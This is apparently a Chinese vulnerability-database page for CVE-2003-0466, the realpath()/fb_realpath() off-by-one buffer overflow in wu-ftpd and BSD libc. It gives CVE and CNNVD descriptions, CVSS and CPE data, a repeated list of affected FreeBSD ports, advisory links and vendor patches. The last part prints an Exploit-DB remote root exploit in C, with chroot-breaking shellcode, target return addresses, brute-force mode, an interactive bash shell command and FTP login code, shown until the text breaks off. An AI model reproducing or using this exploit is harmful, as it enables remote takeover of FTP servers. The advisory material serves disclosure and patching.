CVE-2003-0466
CVSS10.0
发布时间 :2003-08-27 00:00:00
修订时间 :2016-10-17 22:34:07
NMCOEPS    

[原文]Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in wu-ftpd 2.5.0 through 2.6.2 via commands that cause pathnames of length MAXPATHLEN+1 to trigger a buffer overflow, including (1) STOR, (2) RETR, (3) APPE, (4) DELE, (5) MKD, (6) RMD, (7) STOU, or (8) RNTO.


[CNNVD]多家厂商C程序库realpath()单字节缓冲区溢出漏洞(CNNVD-200308-136)

        
        realpath(3)函数用于在给出的路径名中判断规则的绝对路径名,给出的路径名可能包含``/''字符, 并涉及到如``/./'' 或``/../''、符号连接等,realpath(3)函数是FreeBSD标准C语言库文件的一部分。
        realpath(3)函数在计算解析获得的路径名长度时存在单字节溢出问题,本地或者远程攻击者可以利用这个漏洞对利用此函数的服务进行缓冲区溢出攻击,可以以进程权限在系统上执行任意指令。
        如果解析获得的路径名是1024字节长,并包含两个目录分割符,缓冲区传递给realpath(3)函数时就可以被单NUL字节覆盖。一般使用realpath(3)函数的应用程序可产生拒绝服务,或者执行任意代码和权限提升攻击。
        在FreeBSD系统中,多个应用程序使用了realpath(3)函数,如:
        lukemftpd(8)是一个变种FTP服务器,realpath(3)用于处理MLST和MLSD命令,这个漏洞可被利用以超级用户权限执行任意代码。
        sftp-server(8)是OpenSSH的一部分,realpath(3)用于处理chdir命令,这个漏洞可被利用以验证用户权限执行任意代码。
        在FreeBSD 4.8-RELEASE的版本中,FreeBSD的PORT集包含如下应用程序使用了realpath(3),不过没有审核是否存在此漏洞,或者可以被利用:
        BitchX-1.0c19_1
        Mowitz-0.2.1_1
        XFree86-clients-4.3.0_1
        abcache-0.14
        aim-1.5.234
        analog-5.24,1
        anjuta-1.0.1_1
        aolserver-3.4.2
        argus-2.0.5
        arm-rtems-gdb-5.2_1
        avr-gdb-5.2.1
        ccache-2.1.1
        cdparanoia-3.9.8_4
        cfengine-1.6.3_4
        cfengine2-2.0.3
        cmake-1.4.7
        comserv-1.4.3
        criticalmass-0.97
        dedit-0.6.2.3_1
        drweb_postfix-4.29.10a
        drweb-4.29.2
        drweb_sendmail-4.29.10a
        edonkey-gui-gtk-0.5.0
        enca-0.10.7
        epic4-1.0.1_2
        evolution-1.2.2_1
        exim-3.36_1
        exim-4.12_5
        exim-ldap-4.12_5
        exim-ldap2-4.12_5
        exim-mysql-4.12_5
        exim-postgresql-4.12_5
        fam-2.6.9_2
        fastdep-0.15
        feh-1.2.4_1
        ferite-0.99.6
        fileutils-4.1_1
        finfo-0.1
        firebird-1.0.2
        firebird-1.0.r2
        frontpage-5.0.2.2623_1
        galeon-1.2.8
        galeon2-1.3.2_1
        gdb-5.3_20030311
        gdb-5.2.1_1
        gdm2-2.4.1.3
        gecc-20021119
        gentoo-0.11.34
        gkrellmvolume-2.1.7
        gltron-0.61
        global-4.5.1
        gnat-3.15p
        gnomelibs-1.4.2_1
        gprolog-1.2.16
        gracula-3.0
        gringotts-1.2.3
        gtranslator-0.43_1
        gvd-1.2.5
        hercules-2.16.5
        hte-0.7.0
        hugs98-200211
        i386-rtems-gdb-5.2_1
        i960-rtems-gdb-5.2_1
        installwatch-0.5.6
        ivtools-1.0.6
        ja-epic4-1.0.1_2
        ja-gnomelibs-1.4.2_1
        ja-msdosfs-20001027
        ja-samba-2.2.7a.j1.1_1
        kdebase-3.1_1
        kdelibs-3.1
        kermit-8.0.206
        ko-BitchX-1.0c16_3
        ko-msdosfs-20001027
        leocad-0.73
        libfpx-1.2.0.4_1
        libgnomeui-2.2.0.1
        libpdel-0.3.4
        librep-0.16.1_1
        linux-beonex-0.8.1
        linux-divxplayer-0.2.0
        linux-edonkey-gui-gtk-0.2.0.a.2002.02.22
        linux-gnomelibs-1.2.8_2
        linux-mozilla-1.2
        linux-netscape-communicator-4.8
        linux-netscape-navigator-4.8
        linux-phoenix-0.3
        linux_base-6.1_4
        linux_base-7.1_2
        lsh-1.5.1
        lukemftpd-1.1_1
        m68k-rtems-gdb-5.2_1
        mips-rtems-gdb-5.2_1
        mod_php4-4.3.1
        moscow_ml-2.00_1
        mozilla-1.0.2_1
        mozilla-1.2.1_1,2
        mozilla-1.2.1_2
        mozilla-1.3b,1
        mozilla-1.3b
        mozilla-embedded-1.0.2_1
        mozilla-embedded-1.2.1_1,2
        mozilla-embedded-1.3b,1
        msyslog-1.08f_1
        netraider-0.0.2
        openag-1.1.1_1
        openssh-portable-3.5p1_1
        openssh-3.5
        p5-PPerl-0.23
        paragui-1.0.2_2
        powerpc-rtems-gdb-5.2_1
        psim-freebsd-5.2.1
        ptypes-1.7.4
        pure-ftpd-1.0.14
        qiv-1.8
        readlink-20010616
        reed-5.4
        rox-1.3.6_1
        rox-session-0.1.18_1
        rpl-1.4.0
        rpm-3.0.6_6
        samba-2.2.8
        samba-3.0a20
        scrollkeeper-0.3.11_8,1
        sh-rtems-gdb-5.2_1
        sharity-light-1.2_1
        siag-3.4.10
        skipstone-0.8.3
        sparc-rtems-gdb-5.2_1
        squeak-2.7
        squeak-3.2
        swarm-2.1.1
        tcl-8.2.3_2
        tcl-8.3.5
        tcl-8.4.1,1
        tcl-thread-8.1.b1
        teTeX-2.0.2_1
        wine-2003.02.19
        wml-2.0.8
        worker-2.7.0
        xbubble-0.2
        xerces-c2-2.1.0_1
        xerces_c-1.7.0
        xnview-1.50
        xscreensaver-gnome-4.08
        xscreensaver-4.08
        xworld-2.0
        yencode-0.46_1
        zh-cle_base-0.9p1
        zh-tcl-8.3.0
        zh-tw-BitchX-1.0c19_3
        zh-ve-1.0
        zh-xemacs-20.4_1
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:9.0::x86
cpe:/a:redhat:wu_ftpd:2.6.1-18::ia64
cpe:/a:washington_university:wu-ftpd:2.5.0
cpe:/a:redhat:wu_ftpd:2.6.1-18::i386
cpe:/o:freebsd:freebsd:4.1.1:release
cpe:/a:redhat:wu_ftpd:2.6.1-16::i386
cpe:/o:netbsd:netbsd:1.6.1NetBSD 1.6.1
cpe:/o:apple:mac_os_x:10.2.6Apple Mac OS X 10.2.6
cpe:/o:openbsd:openbsd:3.3OpenBSD 3.3
cpe:/o:freebsd:freebsd:4.2FreeBSD 4.2
cpe:/o:freebsd:freebsd:4.6:release
cpe:/o:openbsd:openbsd:3.0OpenBSD 3.0
cpe:/o:freebsd:freebsd:4.3FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.7:release
cpe:/o:freebsd:freebsd:4.8FreeBSD 4.8
cpe:/o:freebsd:freebsd:4.6FreeBSD 4.6
cpe:/o:freebsd:freebsd:4.3:release
cpe:/o:freebsd:freebsd:4.7FreeBSD 4.7
cpe:/o:openbsd:openbsd:3.2OpenBSD 3.2
cpe:/o:freebsd:freebsd:4.5:release
cpe:/o:openbsd:openbsd:3.1OpenBSD 3.1
cpe:/o:freebsd:freebsd:5.0:alpha
cpe:/o:freebsd:freebsd:4.0FreeBSD 4.0
cpe:/a:redhat:wu_ftpd:2.6.1-16::powerpc
cpe:/o:freebsd:freebsd:4.1FreeBSD 4.1
cpe:/o:freebsd:freebsd:4.6.2FreeBSD 4.6.2
cpe:/o:freebsd:freebsd:4.4FreeBSD 4.4
cpe:/o:freebsd:freebsd:4.5FreeBSD 4.5
cpe:/o:sun:solaris:9.0::sparc
cpe:/o:freebsd:freebsd:4.1.1:stable
cpe:/o:freebsd:freebsd:4.1.1FreeBSD 4.1.1
cpe:/a:washington_university:wu-ftpd:2.6.1
cpe:/a:washington_university:wu-ftpd:2.6.0
cpe:/a:washington_university:wu-ftpd:2.6.2
cpe:/o:netbsd:netbsd:1.5.1NetBSD 1.5.1
cpe:/o:netbsd:netbsd:1.5.3NetBSD 1.5.3
cpe:/o:freebsd:freebsd:4.3:releng
cpe:/o:netbsd:netbsd:1.5.2NetBSD 1.5.2
cpe:/o:netbsd:netbsd:1.6NetBSD 1.6
cpe:/o:netbsd:netbsd:1.5NetBSD 1.5
cpe:/o:freebsd:freebsd:4.4:releng
cpe:/o:freebsd:freebsd:4.8:pre-release
cpe:/o:openbsd:openbsd:2.9OpenBSD 2.9
cpe:/o:openbsd:openbsd:2.8OpenBSD 2.8
cpe:/o:openbsd:openbsd:2.5OpenBSD 2.5
cpe:/o:openbsd:openbsd:2.4OpenBSD 2.4
cpe:/o:openbsd:openbsd:2.1OpenBSD 2.1
cpe:/o:openbsd:openbsd:2.0OpenBSD 2.0
cpe:/o:openbsd:openbsd:2.7OpenBSD 2.7
cpe:/o:openbsd:openbsd:2.6OpenBSD 2.6
cpe:/o:openbsd:openbsd:2.3OpenBSD 2.3
cpe:/o:openbsd:openbsd:2.2OpenBSD 2.2
cpe:/a:redhat:wu_ftpd:2.6.2-8::i386
cpe:/o:freebsd:freebsd:4.0:alpha
cpe:/o:freebsd:freebsd:5.0FreeBSD 5.0
cpe:/o:freebsd:freebsd:4.2:stable
cpe:/o:freebsd:freebsd:4.3:stable
cpe:/o:freebsd:freebsd:4.4:stable
cpe:/o:freebsd:freebsd:4.5:stable
cpe:/o:freebsd:freebsd:4.6:stable
cpe:/o:freebsd:freebsd:4.7:stable
cpe:/a:redhat:wu_ftpd:2.6.2-5::i386
cpe:/o:apple:mac_os_x_server:10.2.6Apple Mac OS X Server 10.2.6

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1970Off-by-one Error in fb_realpath()
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0466
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-136
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-011.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2003-011.txt.asc
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0065.html
(VENDOR_ADVISORY)  VULNWATCH  20030731 wu-ftpd fb_realpath() off-by-one bug
http://download.immunix.org/ImmunixOS/7+/Updates/errata/IMNX-2003-7+-019-01
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-019-01
http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
(UNKNOWN)  MISC  http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
http://marc.info/?l=bugtraq&m=105967301604815&w=2
(UNKNOWN)  BUGTRAQ  20030731 wu-ftpd fb_realpath() off-by-one bug
http://marc.info/?l=bugtraq&m=106001410028809&w=2
(UNKNOWN)  FREEBSD  FreeBSD-SA-03:08
http://marc.info/?l=bugtraq&m=106001702232325&w=2
(UNKNOWN)  BUGTRAQ  20030804 wu-ftpd-2.6.2 off-by-one remote exploit.
http://marc.info/?l=bugtraq&m=106002488209129&w=2
(UNKNOWN)  BUGTRAQ  20030804 Off-by-one Buffer Overflow Vulnerability in BSD libc realpath(3)
http://securitytracker.com/id?1007380
(UNKNOWN)  SECTRACK  1007380
http://sunsolve.sun.com/search/document.do?assetkey=1-77-1001257.1-1
(UNKNOWN)  SUNALERT  1001257
http://www.debian.org/security/2003/dsa-357
(UNKNOWN)  DEBIAN  DSA-357
http://www.kb.cert.org/vuls/id/743092
(VENDOR_ADVISORY)  CERT-VN  VU#743092
http://www.mandriva.com/security/advisories?name=MDKSA-2003:080
(UNKNOWN)  MANDRAKE  MDKSA-2003:080
http://www.novell.com/linux/security/advisories/2003_032_wuftpd.html
(UNKNOWN)  SUSE  SuSE-SA:2003:032
http://www.redhat.com/support/errata/RHSA-2003-245.html
(UNKNOWN)  REDHAT  RHSA-2003:245
http://www.redhat.com/support/errata/RHSA-2003-246.html
(UNKNOWN)  REDHAT  RHSA-2003:246
http://www.securityfocus.com/archive/1/424852/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060213 Latest wu-ftpd exploit :-s
http://www.securityfocus.com/archive/1/425061/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060214 Re: Latest wu-ftpd exploit :-s
http://www.securityfocus.com/bid/8315
(VENDOR_ADVISORY)  BID  8315
http://www.turbolinux.com/security/TLSA-2003-46.txt
(UNKNOWN)  TURBO  TLSA-2003-46
http://xforce.iss.net/xforce/xfdb/12785
(UNKNOWN)  XF  libc-realpath-offbyone-bo(12785)

- 漏洞信息

多家厂商C程序库realpath()单字节缓冲区溢出漏洞
危急 边界条件错误
2003-08-27 00:00:00 2007-05-11 00:00:00
远程  
        
        realpath(3)函数用于在给出的路径名中判断规则的绝对路径名,给出的路径名可能包含``/''字符, 并涉及到如``/./'' 或``/../''、符号连接等,realpath(3)函数是FreeBSD标准C语言库文件的一部分。
        realpath(3)函数在计算解析获得的路径名长度时存在单字节溢出问题,本地或者远程攻击者可以利用这个漏洞对利用此函数的服务进行缓冲区溢出攻击,可以以进程权限在系统上执行任意指令。
        如果解析获得的路径名是1024字节长,并包含两个目录分割符,缓冲区传递给realpath(3)函数时就可以被单NUL字节覆盖。一般使用realpath(3)函数的应用程序可产生拒绝服务,或者执行任意代码和权限提升攻击。
        在FreeBSD系统中,多个应用程序使用了realpath(3)函数,如:
        lukemftpd(8)是一个变种FTP服务器,realpath(3)用于处理MLST和MLSD命令,这个漏洞可被利用以超级用户权限执行任意代码。
        sftp-server(8)是OpenSSH的一部分,realpath(3)用于处理chdir命令,这个漏洞可被利用以验证用户权限执行任意代码。
        在FreeBSD 4.8-RELEASE的版本中,FreeBSD的PORT集包含如下应用程序使用了realpath(3),不过没有审核是否存在此漏洞,或者可以被利用:
        BitchX-1.0c19_1
        Mowitz-0.2.1_1
        XFree86-clients-4.3.0_1
        abcache-0.14
        aim-1.5.234
        analog-5.24,1
        anjuta-1.0.1_1
        aolserver-3.4.2
        argus-2.0.5
        arm-rtems-gdb-5.2_1
        avr-gdb-5.2.1
        ccache-2.1.1
        cdparanoia-3.9.8_4
        cfengine-1.6.3_4
        cfengine2-2.0.3
        cmake-1.4.7
        comserv-1.4.3
        criticalmass-0.97
        dedit-0.6.2.3_1
        drweb_postfix-4.29.10a
        drweb-4.29.2
        drweb_sendmail-4.29.10a
        edonkey-gui-gtk-0.5.0
        enca-0.10.7
        epic4-1.0.1_2
        evolution-1.2.2_1
        exim-3.36_1
        exim-4.12_5
        exim-ldap-4.12_5
        exim-ldap2-4.12_5
        exim-mysql-4.12_5
        exim-postgresql-4.12_5
        fam-2.6.9_2
        fastdep-0.15
        feh-1.2.4_1
        ferite-0.99.6
        fileutils-4.1_1
        finfo-0.1
        firebird-1.0.2
        firebird-1.0.r2
        frontpage-5.0.2.2623_1
        galeon-1.2.8
        galeon2-1.3.2_1
        gdb-5.3_20030311
        gdb-5.2.1_1
        gdm2-2.4.1.3
        gecc-20021119
        gentoo-0.11.34
        gkrellmvolume-2.1.7
        gltron-0.61
        global-4.5.1
        gnat-3.15p
        gnomelibs-1.4.2_1
        gprolog-1.2.16
        gracula-3.0
        gringotts-1.2.3
        gtranslator-0.43_1
        gvd-1.2.5
        hercules-2.16.5
        hte-0.7.0
        hugs98-200211
        i386-rtems-gdb-5.2_1
        i960-rtems-gdb-5.2_1
        installwatch-0.5.6
        ivtools-1.0.6
        ja-epic4-1.0.1_2
        ja-gnomelibs-1.4.2_1
        ja-msdosfs-20001027
        ja-samba-2.2.7a.j1.1_1
        kdebase-3.1_1
        kdelibs-3.1
        kermit-8.0.206
        ko-BitchX-1.0c16_3
        ko-msdosfs-20001027
        leocad-0.73
        libfpx-1.2.0.4_1
        libgnomeui-2.2.0.1
        libpdel-0.3.4
        librep-0.16.1_1
        linux-beonex-0.8.1
        linux-divxplayer-0.2.0
        linux-edonkey-gui-gtk-0.2.0.a.2002.02.22
        linux-gnomelibs-1.2.8_2
        linux-mozilla-1.2
        linux-netscape-communicator-4.8
        linux-netscape-navigator-4.8
        linux-phoenix-0.3
        linux_base-6.1_4
        linux_base-7.1_2
        lsh-1.5.1
        lukemftpd-1.1_1
        m68k-rtems-gdb-5.2_1
        mips-rtems-gdb-5.2_1
        mod_php4-4.3.1
        moscow_ml-2.00_1
        mozilla-1.0.2_1
        mozilla-1.2.1_1,2
        mozilla-1.2.1_2
        mozilla-1.3b,1
        mozilla-1.3b
        mozilla-embedded-1.0.2_1
        mozilla-embedded-1.2.1_1,2
        mozilla-embedded-1.3b,1
        msyslog-1.08f_1
        netraider-0.0.2
        openag-1.1.1_1
        openssh-portable-3.5p1_1
        openssh-3.5
        p5-PPerl-0.23
        paragui-1.0.2_2
        powerpc-rtems-gdb-5.2_1
        psim-freebsd-5.2.1
        ptypes-1.7.4
        pure-ftpd-1.0.14
        qiv-1.8
        readlink-20010616
        reed-5.4
        rox-1.3.6_1
        rox-session-0.1.18_1
        rpl-1.4.0
        rpm-3.0.6_6
        samba-2.2.8
        samba-3.0a20
        scrollkeeper-0.3.11_8,1
        sh-rtems-gdb-5.2_1
        sharity-light-1.2_1
        siag-3.4.10
        skipstone-0.8.3
        sparc-rtems-gdb-5.2_1
        squeak-2.7
        squeak-3.2
        swarm-2.1.1
        tcl-8.2.3_2
        tcl-8.3.5
        tcl-8.4.1,1
        tcl-thread-8.1.b1
        teTeX-2.0.2_1
        wine-2003.02.19
        wml-2.0.8
        worker-2.7.0
        xbubble-0.2
        xerces-c2-2.1.0_1
        xerces_c-1.7.0
        xnview-1.50
        xscreensaver-gnome-4.08
        xscreensaver-4.08
        xworld-2.0
        yencode-0.46_1
        zh-cle_base-0.9p1
        zh-tcl-8.3.0
        zh-tw-BitchX-1.0c19_3
        zh-ve-1.0
        zh-xemacs-20.4_1
        

- 公告与补丁

        厂商补丁:
        FreeBSD
        -------
        FreeBSD已经为此发布了一个安全公告(FreeBSD-SA-03:08)以及相应补丁:
        FreeBSD-SA-03:08:Single byte buffer overflow in realpath(3)
        链接:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:08.realpath.asc
        补丁下载:
        # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:08/realpath.patch
        # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:08/realpath.patch.asc
        MandrakeSoft
        ------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Mandrake Upgrade wu-ftpd-2.6.2-1.1mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 Directory: 8.2/RPMS/
        Mandrake Upgrade wu-ftpd-2.6.2-1.1mdk.src.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 Directory: 8.2/SRPMS/
        Mandrake Upgrade wu-ftpd-2.6.2-1.1mdk.ppc.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2/PPC Directory: ppc/8.2/RPMS/
        Mandrake Upgrade wu-ftpd-2.6.2-1.1mdk.src.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2/PPC Directory: ppc/8.2/SRPMS/
        NetBSD
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        NetBSD Patch SA2003-011-realpath.patch
        ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2003-011-realpath.patch
        OpenBSD
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        OpenBSD Patch 015_realpath.patch
        ftp://ftp.OpenBSD.org/pub/OpenBSD/patches/3.2/common/015_realpath.patch
        RedHat
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        RedHat Upgrade wu-ftpd-2.6.2-11.71.1.i386.rpm
        ftp://updates.redhat.com/7.1/en/os/i386/wu-ftpd-2.6.2-11.71.1.i386.rpm
        RedHat wu-ftpd-2.6.1-18.i386.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-11.72.1.i386.rpm
        ftp://updates.redhat.com/7.2/en/os/i386/wu-ftpd-2.6.2-11.72.1.i386.rpm
        RedHat wu-ftpd-2.6.2-5.i386.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-11.73.1.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/wu-ftpd-2.6.2-11.73.1.i386.rpm
        RedHat wu-ftpd-2.6.2-8.i386.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-12.i386.rpm
        ftp://updates.redhat.com/8.0/en/os/i386/wu-ftpd-2.6.2-12.i386.rpm
        RedHat wu-ftpd-2.6.1-18.ia64.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-11.72.1.ia64.rpm
        ftp://updates.redhat.com/7.2/en/os/ia64/wu-ftpd-2.6.2-11.72.1.ia64.rpm
        RedHat wu-ftpd-2.6.1-16.ppc.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-11.71.1.ppc.rpm
        ftp://updates.redhat.com/7.1/en/os/iSeries/ppc/wu-ftpd-2.6.2-11.71.1.ppc.rpm
        RedHat Upgrade wu-ftpd-2.6.2-11.71.1.ppc.rpm
        ftp://updates.redhat.com/7.1/en/os/pSeries/ppc/wu-ftpd-2.6.2-11.71.1.ppc.rpm
        S.u.S.E.
        --------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        SuSE Upgrade wuftpd-2.6.0-403.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/n2/wuftpd-2.6.0-403.i386.rpm
        SuSE-7.3 Intel
        SuSE Upgrade wuftpd-2.6.0-403.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/wuftpd-2.6.0-403.src.rpm
        SuSE-7.3 Intel
        SuSE Upgrade wuftpd-2.6.0-403.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/n2/wuftpd-2.6.0-403.i386.rpm
        SuSE-7.2 Intel
        SuSE Upgrade wuftpd-2.6.0-403.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/wuftpd-2.6.0-403.src.rpm
        SuSE-7.2 Intel
        SuSE Upgrade wuftpd-2.6.0-260.sparc.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n2/wuftpd-2.6.0-260.sparc.rpm
        SuSE-7.3 Sparc
        SuSE Upgrade wuftpd-2.6.0-260.src.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/wuftpd-2.6.0-260.src.rpm
        SuSE-7.3 Sparc
        SuSE Upgrade wuftpd-2.6.0-328.ppc.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n2/wuftpd-2.6.0-328.ppc.rpm
        SuSE-7.3 PPC
        SuSE Upgrade wuftpd-2.6.0-328.src.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/wuftpd-2.6.0-328.src.rpm
        SuSE-7.3 PPC

- 漏洞信息 (74)

wu-ftpd 2.6.2 off-by-one Remote Root Exploit (EDBID:74)
linux remote
2003-08-03 Verified
21 Xpl017Elz
N/A [点击下载]
/*
**
**  wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
**       exploit by "you dong-hun"(Xpl017Elz)
**  
**     Brute-Force function added.
**
*/

#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"

void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();

struct os
{
int num;
char *v_nm;
u_long sh_addr;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char shellcode_ffx2[]=
/* setuid/chroot-break/execve shellcode by Lam3rZ */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";

struct os plat[]=
{
/*
** I enjoy version up, will not share more. :-}
*/
{
0,"RedHat Linux 6.x Version wu-2.6.0(1) compile",0x0806a59c
},
{
1,"RedHat Linux 6.x Version wu-2.6.1(1) compile",0x0806aad8
},
{
2,"RedHat Linux 6.x Version wu-2.6.2(2) compile",0x0806aa60
},
{
0x82,NULL,0x0
},
{
0x8282,"Brute-Force mode",0x0806a082
}
};

void prcode_usage(char *f_nm)
{
int r_n=(NRL);
fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
fprintf(stdout," \t-h [hostname] : Target hostname & ip.\n");
fprintf(stdout," \t-u [userid] : User id.\n");
fprintf(stdout," \t-p [passwd] : User password.\n");
fprintf(stdout," \t-n [port num] : Target port number.\n");
fprintf(stdout," \t-s [shelladdr] : Shellcode address.\n");
fprintf(stdout," \t-b : Brute-Force mode.\n");
fprintf(stdout," \t-m [max num] : Brute-Force Count number.\n");
fprintf(stdout," \t-i : help information.\n");
fprintf(stdout," \t-t [target num] : Select target number.\n\n");
for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
{
fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
}
fprintf(stdout,"\n Example: %s -hlocalhost -ux82 -px82 -n21 -t0\n\n",f_nm);
exit(FAD);
}

u_long null_chk(u_long sh_addr)
{
if((sh_addr>>(NRL)&0xff)==(0x00))
{
return(sh_addr+=(SCS));
}
else return(sh_addr);
}

void ftpd_login(int sock,char *user,char *pass)
{
char send_recv[(GET_R)];

(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

if(!strstr(send_recv,(FTP_CONN_SCS)))
{
fprintf(stdout," [-] ftpd connection failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," [*] ftpd connection success.\n");
fprintf(stdout," [+] User id input.\n");

memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
send(sock,send_recv,strlen(send_recv),(NRL));

(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

if(!strstr(send_recv,(FTP_USER_FAD)))
{
fprintf(stdout," [-] User id input failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," [+] User password input.\n");

memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
send(sock,send_recv,strlen(send_recv),(NRL));

(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

if(strstr(send_recv,(FTP_LOGIN_FAD)))
{
fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
close(sock);
exit(FAD);
}
else if(strstr(send_recv,(FTP_LOGIN_SCS)))
{
fprintf(stdout," [*] User %s logged in.\n",user);
}
else
{
fprintf(stdout," [-] ftpd handshake failure.\n\n");
close(sock);
exit(FAD);
}
return;
}

